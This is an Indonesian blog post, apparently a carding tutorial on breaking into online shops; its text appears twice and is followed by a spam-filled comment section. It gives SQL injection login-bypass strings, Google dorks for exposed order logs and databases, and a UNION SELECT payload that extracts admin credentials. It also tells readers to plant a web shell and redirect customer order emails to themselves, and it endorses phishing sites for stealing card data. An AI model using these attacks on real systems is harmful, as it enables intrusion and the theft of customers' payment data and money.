Mungkin langsung saja ya,kagak usah basa-basi :D,,sun dulu deh mua mua muah :* :*
1. Teknik Dengan Menggunakan User & Password Admin Default – SQL Injection Basic
Teknik ini menggunakan kelemahan dari SQL Injection String Login, caranya cukup mudah hanya dengan memasukkan code di bawah ini pada user dan password pada login di website store admin. Adapun code user dan password itu diantaranya:admin:’ or a=a–admin:’ or 1=1–user:’ or 1=1–admin:’ or 1=1–dsbContoh:Silakan cari di google keyword: “/shopadmin.asp” or “/adminshop.asp” or “/shopadm.asp” or “/shoppingadmin.asp”Misal target :http://www.namasitusnya.com/shop/admin/shopadmin.aspSilakan masukkan kombinasi kombinasi password yang telah saya sebutkan diatas, klo masuk berarti anda berhasil
2. Shopping Order Log – Informasi Log Order di Server
Ini sangat mudah untuk di dapatkan, ada berbagai log yang tersimpan di berbagai server. Bisanya dalam bentuk *.log, *.rtf, *.txt, *.xls, dsb. Nah bagaimana mendapatkan informasi ini di web target. Itu tergantung dari imajinasi anda untuk menemukannya. Biasanya ini di server berbasis .cgi, .asp, .php, dsb.Contoh:Silakan cari di google keyword: “order.txt” or “order.log” or “order.asp” or “order.cgi”atau inurl:order filetype:txt / inurl:order filetype:log dsb.Misal target:http://www.namasitusnya.net/shop/admin/log/order.loghttp://www.namasitusnya.org/shop/order.cgi?dir=./order/order.loghttp://www.namasitusnya.la/shopping/DCShop/orders/orders.txtSelamat menemukan
3. Database Information – Database Source Location – Database Path
Pada bagian ini, kita mendapatkan informasi lokasi database. Sehingga kita bisa mendownload database yang ada di server. Kebanyakan yang include di server .mdb.Contoh:Silakan cari di google keyword: “*.mdb” or “order.mdb” or “database.mdb”atau menggunakan info DB: inurl: ESHOP, Lobby.asp, Proddetail.asp dsb.Misal target:http://www.namasitusnya.com/shop/shopadmin/database.mdbhttp://www.namasitusnya.org//cgi-bin/eshop/database/order.mdbhttp://www.namasitusnya.com/fpdb/shop.mdbhttp://www.namasitusnya.com/shopping/data/vsproducts.mdbSelamat mencari.. ^^
4. SQL Injection Advanced Shop Vulnreabilty
Dibagian ini, akan dijelaskan mengenai teknik teknik menngunakan SQL Injection. Menggunakan sedikit kombinasi: union, join, select, update, dsb. Pada tutorial ini, diharapkan anda sudah bisa menggunakan SQL Injection sebelumnya.Contoh:Silakan Buka Google dgn key: “product_details.php?item_id=” or “products_rss.php” dsbhttp://www.targetnya.com/shop/product_details.php?item_id=13Ganti tulisan itu dengan :products_rss.php?category_id=1′ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*jadi : http://www.targetnya.com/shop/products_rss.php?category_id=1‘ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*dah kalo ada yang errornya kaya gini :
DB ERROR 1064
We are very sorry, but an error has occurred while processing your request. Please try the operation again by either pressing the Refresh button on your browser, or by going back one page using the Back button. If the error persists, please contact our web development team.
The details of the error are shown below. Please quote this in any correspondance regarding this problem.Page URL: http://www.targetnya.com/shop/products_rss.php?category_id=1‘%20UNION%20SELECT%20concat(login,char(58),password),0%20FROM%20va_admins%20–%20/*Referrer URL:Database error: Invalid SQL: SELECT i.item_id, i.item_type_id, i.item_code, i.item_name, i.friendly_url, i.short_description, i.small_image, i.small_image_alt, i.big_image, i.big_image_alt, i.price, i.is_sales, i.sales_price, i.is_points_price, i.points_price, i.buy_link, i.is_sales, i.full_description, i.manufacturer_code, i.issue_date, ic.category_id, c.category_name, c.short_description AS category_short_description, c.full_description AS category_full_description FROM ((va_items i INNER JOIN va_items_categories ic ON i.item_id=ic.item_id AND ic.category_id IN (1′ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca293929882ad831bf724a2589f1e20)) LEFT JOIN va_categories c ON c.category_id = ic.category_id ) WHERE i.is_showing = 1 GROUP BY i.item_id ORDER BY i.item_order, i.item_idMySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca2′ at line 1
Nah klo udah jangan lupa decrypt passwordnya ya
5. Admin Shop Send Mail Order
Ini bagian sangat simple, pertama tama anda harus tau dulu database administrator. Biasanya ada di config shop adminnya.Contoh:Cari target inject di google, sampe dapet, sampe bisa jalanin rshell / c99 / backdoor lainya.Misal target:http://www.namasitusnya.com/admin/shop/rshellbackdoorloe.phpNah, kan udah masuk tuh di shellnya dia. trus cari config filenya sampe ketemu: config.php, db.php, configuration.php, database.php, db.asp, dsb. Trus buka / cat file tersebut sampe ketemu isi confignya seperti:var $dbtype = ‘mysql’;var $host = ‘localhost’;var $user = ‘shop24_admin’;var $db = ‘shopsex_site’;var $mailer = ‘mail’;var $ordermailsendto = ‘ben@netboost.com.au‘;
Nah pada bagian ini “var $ordermailsendto = ‘ben@netboost.com.au‘;”, di confignya ganti ajah ama email loe, misal di ganti ke: “var $ordermailsendto = ‘carding@gwdapetcarding.com‘;”.Nah tinggal tunggu dah tu di email loe hasil ordernya. Simple tapi maknyuz.. Hahaha..
6. Phising & Scaming
Tram.. Inilah yang paling banyak dilakukan oleh orang orang jaman sekarang. Hahaha.. Phising & scaming. Gampang banget ni.. Loe bisa aje bikin situs fake, pura pura jualan. Tapi sebenernya loe ambil data data card dari sang target. Namun ada beberapa syarat yang harus di penuhin. Syaratnya: Loe harus punya domain sendiri yang meyakinkan. Artinya, di halaman depan udah terdaftar trade mark website loe yang bikin si korban percaya bahwa site ini beneran, bukan scam. Coba klo di web inject, kan agak runyam. kebanyakan 90% gagal klo di web hasil inject. Scam & phising udah banyak di jelasin. So u pasti tahu donk gmn caranya.Pertama, loe harus download source lengkap untuk scam + phising loe. trus loe install deh di server loe. Hasilnya silakan tunggu di email, soalnya biasanya klo scam set kirimnya ke email sang owner.
Nah gitu ajah dech dari gw, selamat berselancar dah..Segala tindak tanduk jadi tanggung jawab loe sendiri..
Jadikanlah ilmu sebagai pembelajaran yang berharga dalam hidup!
1. Teknik Dengan Menggunakan User & Password Admin Default – SQL Injection Basic
Teknik ini menggunakan kelemahan dari SQL Injection String Login, caranya cukup mudah hanya dengan memasukkan code di bawah ini pada user dan password pada login di website store admin. Adapun code user dan password itu diantaranya:admin:’ or a=a–admin:’ or 1=1–user:’ or 1=1–admin:’ or 1=1–dsbContoh:Silakan cari di google keyword: “/shopadmin.asp” or “/adminshop.asp” or “/shopadm.asp” or “/shoppingadmin.asp”Misal target :http://www.namasitusnya.com/shop/admin/shopadmin.aspSilakan masukkan kombinasi kombinasi password yang telah saya sebutkan diatas, klo masuk berarti anda berhasil
2. Shopping Order Log – Informasi Log Order di Server
Ini sangat mudah untuk di dapatkan, ada berbagai log yang tersimpan di berbagai server. Bisanya dalam bentuk *.log, *.rtf, *.txt, *.xls, dsb. Nah bagaimana mendapatkan informasi ini di web target. Itu tergantung dari imajinasi anda untuk menemukannya. Biasanya ini di server berbasis .cgi, .asp, .php, dsb.Contoh:Silakan cari di google keyword: “order.txt” or “order.log” or “order.asp” or “order.cgi”atau inurl:order filetype:txt / inurl:order filetype:log dsb.Misal target:http://www.namasitusnya.net/shop/admin/log/order.loghttp://www.namasitusnya.org/shop/order.cgi?dir=./order/order.loghttp://www.namasitusnya.la/shopping/DCShop/orders/orders.txtSelamat menemukan
3. Database Information – Database Source Location – Database Path
Pada bagian ini, kita mendapatkan informasi lokasi database. Sehingga kita bisa mendownload database yang ada di server. Kebanyakan yang include di server .mdb.Contoh:Silakan cari di google keyword: “*.mdb” or “order.mdb” or “database.mdb”atau menggunakan info DB: inurl: ESHOP, Lobby.asp, Proddetail.asp dsb.Misal target:http://www.namasitusnya.com/shop/shopadmin/database.mdbhttp://www.namasitusnya.org//cgi-bin/eshop/database/order.mdbhttp://www.namasitusnya.com/fpdb/shop.mdbhttp://www.namasitusnya.com/shopping/data/vsproducts.mdbSelamat mencari.. ^^
4. SQL Injection Advanced Shop Vulnreabilty
Dibagian ini, akan dijelaskan mengenai teknik teknik menngunakan SQL Injection. Menggunakan sedikit kombinasi: union, join, select, update, dsb. Pada tutorial ini, diharapkan anda sudah bisa menggunakan SQL Injection sebelumnya.Contoh:Silakan Buka Google dgn key: “product_details.php?item_id=” or “products_rss.php” dsbhttp://www.targetnya.com/shop/product_details.php?item_id=13Ganti tulisan itu dengan :products_rss.php?category_id=1′ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*jadi : http://www.targetnya.com/shop/products_rss.php?category_id=1‘ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*dah kalo ada yang errornya kaya gini :
DB ERROR 1064
We are very sorry, but an error has occurred while processing your request. Please try the operation again by either pressing the Refresh button on your browser, or by going back one page using the Back button. If the error persists, please contact our web development team.
The details of the error are shown below. Please quote this in any correspondance regarding this problem.Page URL: http://www.targetnya.com/shop/products_rss.php?category_id=1‘%20UNION%20SELECT%20concat(login,char(58),password),0%20FROM%20va_admins%20–%20/*Referrer URL:Database error: Invalid SQL: SELECT i.item_id, i.item_type_id, i.item_code, i.item_name, i.friendly_url, i.short_description, i.small_image, i.small_image_alt, i.big_image, i.big_image_alt, i.price, i.is_sales, i.sales_price, i.is_points_price, i.points_price, i.buy_link, i.is_sales, i.full_description, i.manufacturer_code, i.issue_date, ic.category_id, c.category_name, c.short_description AS category_short_description, c.full_description AS category_full_description FROM ((va_items i INNER JOIN va_items_categories ic ON i.item_id=ic.item_id AND ic.category_id IN (1′ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca293929882ad831bf724a2589f1e20)) LEFT JOIN va_categories c ON c.category_id = ic.category_id ) WHERE i.is_showing = 1 GROUP BY i.item_id ORDER BY i.item_order, i.item_idMySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca2′ at line 1
Nah klo udah jangan lupa decrypt passwordnya ya
5. Admin Shop Send Mail Order
Ini bagian sangat simple, pertama tama anda harus tau dulu database administrator. Biasanya ada di config shop adminnya.Contoh:Cari target inject di google, sampe dapet, sampe bisa jalanin rshell / c99 / backdoor lainya.Misal target:http://www.namasitusnya.com/admin/shop/rshellbackdoorloe.phpNah, kan udah masuk tuh di shellnya dia. trus cari config filenya sampe ketemu: config.php, db.php, configuration.php, database.php, db.asp, dsb. Trus buka / cat file tersebut sampe ketemu isi confignya seperti:var $dbtype = ‘mysql’;var $host = ‘localhost’;var $user = ‘shop24_admin’;var $db = ‘shopsex_site’;var $mailer = ‘mail’;var $ordermailsendto = ‘ben@netboost.com.au‘;
Nah pada bagian ini “var $ordermailsendto = ‘ben@netboost.com.au‘;”, di confignya ganti ajah ama email loe, misal di ganti ke: “var $ordermailsendto = ‘carding@gwdapetcarding.com‘;”.Nah tinggal tunggu dah tu di email loe hasil ordernya. Simple tapi maknyuz.. Hahaha..
6. Phising & Scaming
Tram.. Inilah yang paling banyak dilakukan oleh orang orang jaman sekarang. Hahaha.. Phising & scaming. Gampang banget ni.. Loe bisa aje bikin situs fake, pura pura jualan. Tapi sebenernya loe ambil data data card dari sang target. Namun ada beberapa syarat yang harus di penuhin. Syaratnya: Loe harus punya domain sendiri yang meyakinkan. Artinya, di halaman depan udah terdaftar trade mark website loe yang bikin si korban percaya bahwa site ini beneran, bukan scam. Coba klo di web inject, kan agak runyam. kebanyakan 90% gagal klo di web hasil inject. Scam & phising udah banyak di jelasin. So u pasti tahu donk gmn caranya.Pertama, loe harus download source lengkap untuk scam + phising loe. trus loe install deh di server loe. Hasilnya silakan tunggu di email, soalnya biasanya klo scam set kirimnya ke email sang owner.
Nah gitu ajah dech dari gw, selamat berselancar dah..Segala tindak tanduk jadi tanggung jawab loe sendiri..
Jadikanlah ilmu sebagai pembelajaran yang berharga dalam hidup!
sumber : Manusia Biasa Team
{ 19 komentar... read them below or add one }
ini ane udah bisa om, tapi males show opp...
oiya kita followback yuk om atau gak back link. link ente dah ane pasang di :
[http://dc-cyber4rt.blogspot.com/2012/03/back-link-gratis-dgn-dc-cyber4rt.html]
di tunggu lho om backlinknya :* =)) =))
hohoho .. mastab kaka ..
oh iya .. dengan cara kk komen di blog ini aja udah dpt backlink ko kaka .. :D
agen casino indonesia
agen judi sbobet
agen sbobet indonesia
agen sbo
agen sbobet terpercaya
agen sbobet
agen sbo terpercaya
agen judi terpercaya
sbosports
agent sbobet
agen sbobet indonesia
bandar judi terpercaya
agen judi bola terpercaya
agen judi ibcbet
sbobet indonesia
agen bola online
bandar judi bola
master agen betting online
bandar bola sbobet terpercaya
judi online
BANDARQ
Agen Poker
situs poker
poker online
Judi Poker Online
situs poker online terpercaya
Poker Online Terpercaya
poker uang asli
Domino QQ
Domino Poker
Capsa Online
QQ Online
Ceme Online
Blackjack Online
Poker Online Indonesia
Agen poker online
poker online asli
agen poker terbaik
agen poker terpercaya
situs poker uang asli
situs judi online
poker online
agen judi bola
agen judi terpercaya dan terlengkap
judi online
It's really a nice and helpful scr888 casino download malaysia piece of information. I'm glad that you shared this helpful info with us. Please keep us informed like this.
This article has great reference 918kiss free credit no deposit 2019 malaysia value, thank you very much for sharing, I would like to reproduced your article, so that more people would see it.
Wow, what a blog! I mean, you just have so much guts to go ahead and tell it like it is. Youre what blogging needs, an open minded superhero scr888 apk download who isnt afraid to tell it like it is. This is definitely something people need to be up on. Good luck in the future, man
I think most people would agree with your article. I am going to bookmark this web site Rapid Slim Keto Diet so I can come back and read more articles. Keep up the good work!
This discussion scr888 kiosk unexpectedly takes my attention scr888 agent to join inside. Well, after I read all of them, it gives me new idea for my blog. thanks
I really like kiosk.918kiss download the fresh perceptive you did on 918kiss ios the issue. I will be back soon to 918kiss download android 2019 check up on new posts! Thank you!
You got a really useful blog I have been here reading for about half an hour. I am a newbie and your post is valuable for me.
https://news.wikitechguru.com/2019/12/02/aladdin99-aladdin-99/
Ultra Fast Keto Boost now not deposit inside the arteries. In truth, HDL has the exact opposite function: it eliminates the LDL deposits shaped within the vessels.
Researchers agree with that HDL ldl cholesterol acts like a broom, which redirects the accumulated fats to the liver. as soon as there, the lipids are degraded and sent for disposal.
https://purefitketodietplan.com/ultra-fast-keto-boost/
Basically, this influence is taken to the diet, which believes Go ketogenic that every change of the moon must maintain a totally liquid diet, since the power of the moon interferes with water.
https://goketoganic.com/
can someone tell me how to get the little http://www.mega888slots.com/ avatars to appear in my comments section? thanks!
Great article it was such an interesting and informative article.Congratulations you guys malaysia scr888 nice couple, have fun.Congrats, determination and hard working never get bad result.
Great article it was such an interesting https://www.scr888malaysian.com/ and informative article. wow so lovely decorations, table are greatly decorated.
Are you looking online payment gateway provider, ZoftPay is a digital e-payment company based on United Kingdom that offers safe, secure and reliable all-in-one payment solution. ZoftPay provides robust modern payment technology like gaming payment gateway, forex payment gateway, crypto payment gateway, ecommerce ecommerce payment gateway india payment gateway, merchant account providers, high risk payment gateway, that lets you enjoy safe and seamless transactions backed by our certified anti-fraud system.
Best Digital Marketing Agency UK 2021
CBD oil is becoming one of the hottest new products on the market today. In fact, annual sales of CBD oil products in 2018 was nearly 600 million define supplement and is estimated to be growing at a rate exceeding 107 percent annually. Prior to 2017, CBD products were available only in head shops, natural food stores, and at a few doctor's offices. Since that time, the market has exploded and CBD products are now available in natural food stores, national food stores, beauty salons, nail salons, convenience stores, and even gas stations. But, are these CBD products manufactured from safe CBD oil?
Most of these unsafe CBD oil Prime Tinnitus products are grown and manufactured in China, Mexico, and numerous third world countries that attain tiny or no oversight in the products they sell.
Posting Komentar
Blog Ini Bersifat Do Follow yg Berarti dpt Memberikan Backlink Gratis Kpd Blog Anda Jika Berkomentar Dibawah ini :
"Komentar Harus Bersifat Membangun Dan Tidak Menjatuhkan akan Kami Hargai"